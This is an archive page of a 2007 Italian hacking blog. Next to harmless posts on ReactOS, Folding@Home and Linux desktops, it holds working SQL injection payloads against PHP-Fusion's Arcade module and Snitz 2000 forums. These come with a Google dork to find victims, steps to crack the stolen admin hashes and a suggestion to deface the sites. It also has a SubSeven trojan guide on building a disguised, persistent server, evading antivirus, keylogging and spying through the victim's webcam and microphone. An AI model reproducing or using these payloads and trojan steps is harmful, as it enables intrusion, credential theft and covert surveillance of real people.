Archivio per luglio 2007

ReactOS la nuova minaccia a Microsoft: funziona come Windows ma senza problemi!

ReactOS è una grandiosa sfida Open Source, un sistema compatibile con Windows ma che non ha gli stessi problemi.

Il Team di ReactOS ha un obiettivo fondamentale: il dialogo binario compatibile con i driver e sotware applicativi di Windows.

Il progetto ReactOS è giovanissimo, ma si sta espandendo sempre più, sul sito ufficiale sono linkati tantissimi forum, canali IRC, blog degli sviluppatori, da queste fonti possiamo ricavare tantissime informazioni oltre alle normalissime FAQ, molto sviluppati e frequentati sono le Mailing List e il Forum italiano.

E’ un progetto grandioso, i sorgenti sono disponibili per tutti, ha un funzionamento uguale a Windows anche se il codice è diverso.

ReactOS 0.3.1 è ancora in Alpha, in pieno sviluppo, non è il caso di affidare a questo sistema il lavoro di tutti i giorni, ci sono ancora tanti bug ma il sistema funziona, abbiamo la suite di Open Office e AbiWord che vanno alla grande, se abbiamo un cd della suite Microsft Office possiamo pure provarla, sono già stati testati con successo i giochi basati su OpenGL come come Deus, Quake e Unreal Turnament girano benissimo.

ReactOS ha un installazione similissima al DOS, alla prima schermata premiamo invio confermando la nostra intenzione di installarlo, successivamente settiamo il layout di tastiera, il tipo di schermo e tutto il resto.

Quando abbiamo finito selezioniamo “Accet the device setting” e premiamo invio, adesso parte l’installazione del sistema operativo, appena terminata passiamo a configurare i parametri del sistema: date e ora, fuso orario ecc…

Adesso ci ritroviamo una schermata molto rassomigliante a quella di Windows, con i soliti menù e le solite finestre. 😀

Perché non installarlo o provare la Live CD senza moficare nulla; possiamo anche contribuire al suo sviluppo, nella speranza futura che questo S.0 diventi bello robusto, così potremo finalmente far cessare lo stupido “monopolio” Microsoft sul mondo dei Personal Computer. 😉

Sito ufficiale del progetto -> ReactOS

Download ReactOS 0.3.1 -> QUI!

Download LiveCD -> QUI!

 

I servizi 2.0 che uso! Ho trasformato la partita di pallavolo in una staffetta! XD

Questo articolo lo devo a no1globe che “mi ha passato la palla”, sono più bravo in atletica quindi avrei preferito un “testimone”. 😀

Lo schema utilizzato è stato rubato a Lazza *lol*, trascendiamo se i servizi siano 2.0 o 2.5 in Beta Test! 😀

  • Comunicare: ProMirc sui canali: #ubuntu-it, #suse-it; aMSN, WLM su windows (Dual Boot); mailing list: suse-linux@suse.com, ubuntu-it-promozione; forum vari qualcuno lo gestisco personalmente e la WBChat Lycos.

  • Rss Reader: Google Reader
  • Bookmark: Firefox.
  • Statistiche: WordPress.com, ShinyStat.
  • Immagini e Video: YouTube, Google Video.
  • Blog: wordpress.com.
  • Postare file: ImageShack, ImageHosting P2PForum, Megaupload, ftp.
  • Cataloghi: ho solo inserito il blog ma non li uso… non mi ricordo nemmeno un nome (hehe).
  • Qualsiasi altra cosa: Account Premium su RPG Monstergames e mi piace gustarmi le demo su pouet.net, arte e programmazione in pochi bit.;-)

Questo post è per “natura” una “Catena di Sant’Antonio”:D, quindi mi tocca passare il testimone, i prescelti sono: Damidalla, Lillipuziano, 2Virgos, LFD.

Buona corsa a tutti quanti! 😉

Folding@Home: aiutiamo la ricerca sull’Alzheimer, mucca pazza (BSE), CJD, ALS, Huntington e Parkinson con la nostra CPU

Folding@Home è un progetto di calcolo distribuito per lo studio degli avvolgimenti, delle dissociazioni ed aggregazioni delle proteine e delle loro relative incidenze sulle malattie.

La ricerca comprende le seguenti malattie:

  • Morbo di Huntington
  • Morbo di Parkinson
  • Morbo di Alzheimer
  • BSE (Mucca Pazza)
  • Osteogenesis imperfecta
  • Cancro…

Come aiutare la ricerca:

Il progetto non si basa su supercomputer, ma si basa su tutti i PC degli utenti che mettono a disposizione parte della propria CPU quando non è utilizzata.

Possiamo contribuire al progetto installando un piccolo client, questo client lavora in background e utilizza la CPU quando non è carica di lavoro. Nei personal computer moderni, la CPU è raramente utilizzata al 100% per tutto il tempo, il client di Folding@home sfrutta la percentuale di processore non utilizzata.

Il client è disponibile per tutte le piattaforme, anche per le playstation 3, il software per PlayStation 3 è stato rilasciato il 23 marzo 2007 e tre giorni dopo la PlayStation 3 generava il triplo della potenza di calcolo dei sistemi Windows.

Nella tabella si può notare come una playstation 3 ha una potenza di calcolo superiore (Current TFLOPS) ai sistemi Windows più del triplo.

folding_ps3_stats.gif (9537 bytes)

Sito Ufficiale progetto-> Folding@Home

Download del Client -> QUI!

Windows Vista Aero Vs Ubuntu+Compiz Fusion, superiorità Linux! (KDE4 Alpha)

Ecco un paio di video presi da YouTube:

Confronto Windows Vista Aero Vs Linux Ubuntu+ Beryl

 

Il Cubo gira anche su windows… solo in orizzontale

 

Un anteprima dello sviluppo del nuovo Compiz Fusion

 

Beryl+Compiz=Compiz Fusion

 

Deskop 3D, con TouchScreen + XGL su Linux

 

KDE4 Alpha, in sviluppo non ci si ferma mai…

 

Dopo questa breve panoramica adesso spetta a voi scegliere tra Windows o Linux
Bye 😉

Exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Vulnerability

Un altro exploit by Xoron, il bug affligge PHP-Fusion precisamente il modulo Arcade, è una remote SQL Injection.

Inanzitutto possiamo aiutare qualche webmaster sprovveduto che non ha ancora aggiornato il suo portale,

possiamo trovare siti vulnerabili con una GOOGLE DORK, facciamo una ricerca su google scrivendo: /infusions/arcade/, non appena troviamo un sito vulnerabile possiamo avvisare l’amministratore del bug.

Il bug è nell’ index.php, basta aggiungere all’indirizzo http://indirizzovittima.com/infusions/arcade/

la stringa:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/

null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Aggiorniamo la pagina, se l’exploit ha funzionato il modulo Arcade ci mostrerà gli User e le password criptate in Hash MD5, copiamo i dati dell’admin, e diamo in pasto l’hash a passcracking.ru.

Non appena il cracker ci restituisce la password in chiaro, possiamo effettuare l’accesso al portale con l’account dell’Admin, possiamo defacciare il sito con un redirect ad un nostro indirizzo con una nostra grafica personalizzata che indica il bug e i possibili rimedi, mi raccomando niente danni! 😉

Un vero hacker si limita soltando a segnalare i bug e a dare spiegazioni su come risolverli, non distrugge nulla!

Adesso vi saluto! Alla prossima! Ciau 🙂

Exploit Snitz 2000 Version 3.1 SR4 Remote SQL Injection Vulnerability

Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.

Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:

trovare l’username dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1

esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1

vi comparirà il nick dell’Admin;

trovare la password dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?

mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9

,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS

Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!

Bye Bye 😉

Guida Trojan: SubSeven 2.2, il controllo remoto nascosto alla portata di tutti

I cavalli di Troia sono per molti aspetti comuni programmi per il controllo remoto con la sola unica differenza che i Trojan non si svelano all’utente che ospita il server. Il loro funzionamente è semplicissimo, una qualsiasi applicazione contiene una sotto-applicazione che prende il controllo della macchiana su cui viene fatta girare.

I Trojan aprono delle porte di comunicazione sia in entrata che in uscita, in modo che ogni volta che il pc infetto si connette, possano inviare tutte le informazioni della macchina e su cui è installato e attendere i comandi dell’attaccante.
In questo articolo mi limiterò a descrivere e guidare nell’uso di SubSeven, questo Trojan permette l’upload e il download dei file dalla macchian infetta, permette di agire sul filesystem come meglio si crede, l’esecuzione di programmi, la cattura di screanshot del desktop, il log di tutti i tasti premuti, la cancellazione di interi hard-disk ecc…
Attualmente sono conusciute undici versioni diverse, ciascuna con un proprio sistema di infezione ma con funzioni similari.

L’ultima versione è la 2.2 potete scaricarla da QUI!
Dopo aver estratto i file, miraccomando di disattivare l’antivirus durante l’uso altrimenti non riuscirete a lavorare. Partiamo con creare un server che poi dovrà essere inviato alla vittima, miraccomando di non aprire il server sul vostro PC se non sapete quello che state facendo. Per creare un server dobbiamo usare EDIT SERVER.EXE, si aprirà una finesta con due bottoni:

  1. Run Normal Mode
  1. Run Advanced Mode.

La prima va benone, adesso ci sono 8 menu sulla sinistra:

  • Server Settings

Potete settare il nome della vittima, il numero di porta, il nome del server, vi consiglio di spuntare “melt server after installation”, serve per nascondere il server avvenuta l’installazione.

  • Startup methods

Potete settare il metodo di avvio del server sulla macchina, spuntate le prime quattro opzioni.

  1. Notifications

Settate il metodo di notifica, via ICQ, via e-mail, via Mirc, non appena la vittima si collegherà vi arriverà un messaggio col numero IP della macchina.

  • Blinded Files

Per camuffare l’exe del server è possibile unirlo ad un altro exe.

  • Plugins

I plugins si possono inserire anche dopo essere collegati alla vittima e servono per il completo funzionamento di SubSeven.

  • Restrictions

Le restrizioni per il controllo di subseven, potete settarle in questo menu.

  • E-mail

In questo menù potete inserire la vostra mail dove riceverete messaggi di posta contenenti informazioni segrete e riservate come password.

  • Exe icon/other

Affinchè la vittima non si insospettisca potete cambiare l’icona del server, potete anche settare un messaggio di errore che spunterà subito dopo l’esecuzione del server, il vantaggio è che potete personalizzarlo come meglio credete, facendo passare il prog anche per una patch di MSN.
Dopo aver eseguito tutti questi passaggi, per salvare il server, cliccare su “save as…” e scrivere il nome del file.

Adesso possiamo passare al lato Client di SubSeven, dopo aver aperto il client vi apparirà una finestrella con 9 menù:

  • Shortcuts

E’ il client in versione essenziale, tutte le funzioni sintetizzate.

  • Connection

Permette di conoscere il pc della vittima, informazioni su di essa, ed è possibile cambiare anche delle impostazioni del server come ad esempio la password, la porta e tante altre cose…
– Connect commands ci permette di gestire tutte le connessioni.
– Scanner fa una scansione nella rete e permette di trovare macchine con SubSeven Server.

  • Keys/messages

E’ possibile aprire una finestra sul PC della vittima con la funzione “matrix”, così potete chattare con la vittima, con la funzione “msg manager” potete creare messaggi di errore da inviare alla vittima, “spy manager” permette di visualizzare i messaggi della vittima, con la funzione “icq takeover” è possibile prendere il controllo di ICQ.
– Keyboard ci rende possibile attivare e disattivare la tastiera, il keylogger ci visualizza tutti i tasti premuti dalla vittima.

  • Advanced

“Registry editor” permette di aprire l’editor di registro, “Ftp Server” ci apre la porta 21 ed è possibile collegarsi come un server ftp, “App redirect” può farci eseguire delle applicazioni sul PC della vittima, “Process Manager” ci fa visualizzare tutti i processi sulla macchina infetta, “Netstat” mostre le connessioni attive, “Port redirect” fa si che i dati su una certa porta vengano reindirizzati su un altro indirizzo IP a scelta.
-Find files ci fa fare una ricerca di qualsiasi file presente sulla macchina infetta e “Show found files” mostra i file trovati.
-Packet Sniffer è un semplice sniffer di pacchetti
-Password ci fa visualizzare tutte le password del PC.

  • Miscellaneous

La funzione “file manager” serve a controllare l’hard disk, cancellare, scaricare sul nostro PC tutti i dati che ci interessano, “windows manager” permette di vedere tutte le finestre aperte, “text-2speack” per far chiacchierare il PC, “clipboard manager” per guardare tutti gli appunti della nostra vittima e infine “print manager”, se la stampante è accesa possiamo divertirci a stampare tutto quello che vogliamo. [ROFL]

  • Fun manager

Per vedere lo scermo della vittima usiamo “sceen capture”, se invece vogliamo vedere il viso della vittima “webcam”, per capovolgere lo schermo “flip screan”, per aprire un indirizzo web nel browser “open browser”, “resolution” per decidere la risoluzione, “windows color” per cambiargli i colori, volete giocare a TRIS con la vittima bene usate la funzione “tic-tac-toe”.

  • Fun other

Volete riavviargli il picci usate “restart computer”, “mouse” e il suo mouse diventa vostro, “volume setting” per cambiare i settaggi audio, potete registrare audio dal suo microfono con “record mic”
e tante altre cosette carine…

  • Plugins

Ci permette di controllare i plugins

  • Local Option

Vari settaggi per cambiare il vostro client, se non volete lasciare tracce potete utilizzare un proxy.

  • Advanced

Qua possiamo disporre di uno script editor e di una lista di funzioni per tutti gli script.

P.S.

Per chi ha problemi con subseven, può in alternativa scaricare un TROJAN GRATUITO NON RICONOSCIUTO DA NESSUN ANTIVIRUS da QUI!

UPDATE
Troppe lamerate stop download mi dispiace! :S


Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,053,512 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

luglio: 2007
L M M G V S D
« Giu   Set »
 1
2345678
9101112131415
16171819202122
23242526272829
3031